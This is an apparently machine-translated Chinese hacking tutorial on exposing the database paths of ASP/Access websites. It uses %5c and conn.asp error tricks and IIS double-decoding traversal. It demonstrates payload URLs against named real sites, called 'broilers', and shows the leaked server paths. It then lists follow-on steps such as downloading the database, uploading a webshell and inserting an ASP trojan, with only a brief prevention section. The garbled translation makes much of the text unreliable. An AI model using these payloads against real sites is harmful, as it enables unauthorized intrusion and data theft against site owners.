Knowledge of brute-force database

Source: evil gossip Security Team

Last year, I studied Internet Explorer Double decoding for a while, so I had a certain understanding of the storm database. I finally received a hacker's magazine a few days ago,
I have read an article, and I will also talk about my personal understanding of the Article. What I want to talk about here is that if you study it further
Next, we will find that the use of brute-force databases is not just that simple, but there will be more useful stuff.
There are a variety of brute-force database methods. I know more than 3. Common brute-force methods include % 5c, conn. asp, and DDoS.
This article focuses on % 5c and conn. asp.
It can be said that this article is a supplement to the article written by the Vietnamese Prime Minister.

1.% 5c Brute Force
Next, let's try it out with a zombie.
Http://www.yianxin.com/e-market/bbs/select.asp
Brute force:
Http://www.yianxin.com/e-market/bbs%5cselect.asp
The returned information is as follows:
Microsoft Jet Database Engine error '20140901'

'D:/www/yianxin. comgr7shg3l26/e-market/data/yianxinlzn. asp 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.

/E-market/BBS/Conn. asp, Row 3

Let's take a look at the real path and the exposed path.
D:/www/yianxin. comgr7shg3l26/e-market/data/yianxinlzn. asp exposed path
D:/www/yianxin. comgr7shg3l26/e-market/BBS/data/yianxinlzn. asp
After comparison, we found that one BBS was missing.
Here we also find that % 5c is equivalent to the path returned by a rest character.
Absolute path + content after % 5c
Let's take a look at the analysis of brute-force attacks.
Broilers: http://www.guilin.com.cn/renrenbbs/body.asp? Id = 516
URL: http://www.guilin.com.cn/renrenbbs%5cbody.asp? Id = 516
The returned content is as follows:

The image of this topic is as follows:

Broilers: http://www.jijiahao.com/guest/default.asp
Violent URL: http://www.jijiahao.com/guest%5cdefault.asp
The returned content is as follows:

The image of this topic is as follows:

Let's analyze the reasons for success and failure:
Http://www.yianxin.com/e-market/bbs%5cselect.asp
The database will be exposed to brute force attacks. Open select. asp and we will find that
<! -- # Include file = "conn. asp" -->
<! -- # Include file = "pageset. asp" -->
<! -- # Include file = "lock. asp" -->
<! -- # Include file = "CSS. asp" -->
That is to say, other files are called.
So when you use % 5c, the returned path becomes
Select. asp and select. asp after the absolute path + % 5c are called to the path library data/Renren. asp.
So the returned path becomes
Absolute path + path database path. In absolute path and path database path, we know that there is a directory named guest,
In this case, the absolute path + path database path does not exist (the absolute path + guest + path database path exists)
Therefore, the error message we see is returned.
Now let's analyze the cause of the failure:
I personally think it is because of IIS Double decoding,
For example, for the '/' character, the encoded value is % 5c. The three characters are encoded as follows:
'%' = % 25
'5' = % 35
'C' = % 63

If you want to encode the three characters again, there are multiple forms, such:
% 255C
% 35c
% 35% 63
% 25% 35% 63
...

Therefore, "../" can be expressed as ".. % 255C" or ".. % 35c.

After the first decoding, it becomes "... % 5c ". IIS considers this as a normal string and does not violate the security rule inspection. After the second decoding, it will become "../". Therefore, attackers can use "../" to traverse directories and execute arbitrary programs outside the web directory.

For details, refer to the following materials for reference.

When we analyze the cause of the failure in figure 3 and figure 4, we will find that it may be parsed into ../, which can be analyzed by comparing the graph,
Isn't the storm coming out at this moment? Of course not. We need to carefully construct it.
The following will be analyzed.

Next, let's correct common mistakes on the Internet.
1. Not necessarily asp? Id = can be violent, as long as there is a call to other files, it may be violent
2. Not necessarily access, or MSSQL. I have succeeded. In the following summary, I will analyze that IIS may succeed.
3. You do not have to call the database, because the key of % 5c is to call, not necessarily the database.
4. Theoretically, the root directory can be violent through careful construction, but some people say that the contents of the... % 5c cannot be violent because the returned result is
The result after % 5c is irrelevant to the previous one.
5. It doesn't mean that the success rate of multi-layer directories is high. The key to the success of % 5c is to check how the system is parsed. In addition, I personally think it is possible to expose
It has nothing to do with the program, it is more related to the system. Do not believe that you go to Baidu to find a message board for everyone in the same board, you will find that some can be violent
Come out, but some cannot be violent.
Okay. The above is a preliminary understanding of the % 5c brute-force database.

2. Conn. asp Brute Force
Conn. asp is unrelated to the system because of the Directory relationship.
I can also use netbox to set up brute-force attacks, while % 5c is an IIS decoding error. The vulnerability must be in windows.
Similarly, we still use comparison to illustrate the problem.
Broilers: http: // 192.168.0.55/ren/
Violence 1: http: // 192.168.0.55/ren/images/Conn. asp
Violence 2: http: // 192.168.0.55/ren/Conn. asp
The conn. asp in violence 1 is copied from Violence 2.
Returned content:
Violence 1:
Microsoft Jet Database Engine '123'

'C:/Documents and Settings/Xiaoqiu/desktop/wwwroot/ren/images/data/Renren. asp 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.

/Wwwroot/ren/images/Conn. asp, line 3

Violence 2:
All in vain.
Next, let's analyze why conn. asp can be exposed.
The conn. ASP code is as follows:
<%
Set conn = server. Createobject ("ADODB. Connection ")
Conn. Open = "provider = Microsoft. Jet. oledb.4.0; Data Source =" & server. mappath ("Data/Renren. asp ")
Set rs = server. Createobject ("ADODB. recordset ")
Function connclose
Conn. Close
Set conn = nothing
End Function
Function errmsg (Message)
Session ("Err") = message
Response. Redirect "Err. asp"
End Function
%>
Most importantly
Set conn = server. Createobject ("ADODB. Connection ")
Conn. Open = "provider = Microsoft. Jet. oledb.4.0; Data Source =" & server. mappath ("Data/Renren. asp ")
These two sentences are also the key to being exposed.
Let's take a look at the differences between the exposed path and the actual path.
C:/Documents and Settings/Xiaoqiu/desktop/wwwroot/ren/images/data/Renren. asp exposed path
C:/Documents and Settings/Xiaoqiu/desktop/wwwroot/ren/data/Renren. asp real path
We will find an additional images, because the returned path of conn. asp is
Absolute path + database path connected to conn. ASP + conn. asp
Just like the above is equal to the absolute path C:/Documents and Settings/Xiaoqiu/desktop/wwwroot + Ren/images + in front of conn. asp
Data/Renren. asp is the database path.
C:/Documents and Settings/Xiaoqiu/desktop/wwwroot/+ Ren/images/+ Data/Renren. asp
Different connection syntax return paths are not necessarily the same, but the above connection statement returns an absolute path.
Next, let's verify our correctness and save the following content as any file that has been parsed and extended by ASP. dll, as shown in
Linzi. asp, Linzi. CDX, etc. The Code content is as follows:
<%
Set conn = server. Createobject ("ADODB. Connection ")
Conn. Open = "provider = Microsoft. Jet. oledb.4.0; Data Source =" & server. mappath ("Data/Renren. asp ")
%>
At this time, you can put it in any directory, as long as it is not in the Ren directory, that is, the root directory of the message book, you can expose the absolute path,
At this time, you may ask, isn't the root directory no longer available? The answer is yes. You put
Changing data/Renren. asp to any non-existent directory or file can also be exposed. For example
Data123/Renren. asp. Because data123 does not exist, it becomes violent. The returned content is as follows:

Microsoft Jet Database Engine '123'

'C:/Documents and Settings/Xiaoqiu/desktop/wwwroot/ren/data123/Renren. asp 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.

/Wwwroot/ren/2.asp, line 3
We can also find that there are no fewer directories, but there is a directory error. After a lot of tests, I personally concluded that conn. asp was successful.
Reasons and personal opinions on some incorrect opinions on the Internet:
1. You do not have to call the database for brute-force attacks, but you must transfer it to the database or database-related files.
2. Not necessarily conn. asp can be violent. Any directory error caused by calling other files can be reported, such as the dynamic except INC/Conn. asp
Other files stored in INC can also be violent.
3. The reason for conn. ASP's brute force attack is that the directory you returned is not necessarily the actual directory, or it can be said that it does not exist.

3. simple use of violence:
1. Download the database and go to the background to find the upload point, and then obtain the webshell.
2. Insert ASP pony into the database. For details, refer to Angel's article "disaster caused by changing MDB to ASP".
3. Access Cross-Database Query
Statement:
Select count (*) from dv_admin in 'd:/www/data/dvbbs7.mdb'
4. Exploitation during injection, such as MSSQL backup a shell
5. bypass the background verification. For details, refer to the violent library digest I collected.

Well, that's all. The above can be said to be the tip of the iceberg of post-violence Attacks. When you go deeper, you will find that there is more terror.
Something is behind, and 2 K + SP4 has been successfully decoded Using Double decoding, which is just one corner.
Some people say that using ASP. DLL to parse MDB is used to prevent downloading. In fact, some people will find that this is
This is a silly practice. After you use ASP. DLL to parse mdb, you change newmmm. asp to newmm. mdb, which is equivalent
Newmm. asp, because the extensions parsed by ASP. dll will be executed as long as there are ASP statements in them. This is the same as CER, CDX, and so on.
In my opinion, the best way to prevent downloading is to add the table segment <% zhenzhen520 <% to the database. You only need to insert this table.
Anti-download. Anyone familiar with ASP knows that <% zhenzhen520 <% is put into the database. A syntax error will occur because no %>
Terminator, of course, you can say, You can note that, in fact, note is impossible, unless you get the shell, modify the database, no
You don't need to think about it, because even if you add two %> Terminator, but because the content in <%> does not meet the ASP syntax, it will happen.
500 error. Believe it? If you try the Internet, the database of the Internet is like this.

4. Prevention:
1. The best way is as mentioned in the article, that is, all screen errors.
2. Add a fault tolerance statement. However, if you add a fault tolerance statement, the file you added cannot be cracked, but it does not mean that other files
Not violent.
3. Store the database in a non-relative path. For example, if your original path is C:/www/data/dvbbs. asp, you can
The database is changed to C:/, so that the database cannot be downloaded.
Now, let's talk about the anti-DDoS method. Because I am talking nonsense and everyone has read it.

5.% 5c brute force and conn. asp summary:
It can be said that the % 5c brute force is caused by an error in the calling file, and the conn. asp brute force is caused by an error in the returned path or the returned path does not exist.

6. Conn. asp and % 5c combination:
It can be said that the construction is the key to not be exposed during intrusion.
Now let's assume that the guest directory is placed under C:/www/, while conn. asp is placed under C:/www/guest/Conn. asp, which is directly called
Http: // 192.168.0.13/guest/Conn. asp does not report an error because the returned path is correct.
Conn. asp: The returned path does not exist. Now let's compare the different return paths of % 5c and conn. asp.
1.% 5c: absolute path + content after % 5c
2. Conn. asp: absolute path + relative path before conn. ASP + database path called by conn. asp
Assume that http: // 192.168.1.13/guest % 5ccoonn. asp
Then the returned path is changed
Absolute path + conn. asp, but in actual intrusion, we will find that sometimes it is not. In this case, don't forget Double decoding.
Well, I only propose the idea. I think you may have come up with the actual intrusion method.
If you have any questions, you can go to the hybrid alliance or send me an e-mail.